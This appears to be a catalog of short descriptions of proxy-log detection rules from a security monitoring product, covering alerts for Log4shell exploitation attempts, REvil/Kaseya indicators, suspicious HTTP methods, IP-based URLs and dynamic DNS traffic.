Proxy detections

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events due to the number of scanners currently testing systems on the Internet. It is therefore likely to need some kind of tunning.

Source table → cloud.azure

During the normal navigation of a user or system, the URLs do not include the destination port. The use of the port can become suspicious behavior in combination with other factors.

Source table → proxy.all.access

The REvil Ransomware has hit 40 service providers globally due to multiple Kaseya VSA Zero-days. the attack was pushed out via a infected IT Management update from Kaseya.

Source table → proxy.all.access

A record flagged a destination host from a threat intelligence match list.

Source table → proxy.all.access

Access to a several distinct hosts (domains) in a short period of time could be a suspicious behavior that It is important to monitor an control.

Source table → proxy.all.access

Detects the download of a file with a single character filename.

Source table → proxy.all.access

HTTP defines a set of request methods to indicate the desired action to be performed for a given resource. It is necessary monitor the non standard methods used into web servers queries because could be an indicator of an attack.

Source table → proxy.all.access

Detects users downloading high risk files via requests without hostnames or referrers. Most legitimate downloads will have a valid hostname and referrer.

Source table → proxy.all.access

Dynamic DNS services should be associated in several cases with malware and fraud campaigns. Even could be part of a content filter bypass technique used by internal systems.

Source table → proxy.all.access

Alert that checks attempts to exploit CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability in the log raw message. This would include payloads included in the URL, user-agent header, referrer header, or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events due to the number of scanners currently testing systems on the Internet. It is therefore likely to need some kind of tunning.

Source table → proxy.all.access

[Internal connection] Unauthenticated Arbitrary File Read in VMware vCenter before version 6.5u1.

Source table → proxy.all.access

Regular navigation uses domains instead of server IP addresses. Using IP in URL is suspicious behavior and it is closely related to the behavior of the malware.

Source table → proxy.all.access

There are more than ten HTTP Methods but usually clients use a few only. If a client uses all of them or a large number of methods, this could be recon, probing, or enumeration.

Source table → proxy.all.access

It is considered a suspicious behavior that a user is blocked by a proxy server on many occasions in a short period of time.

Source table → proxy.all.access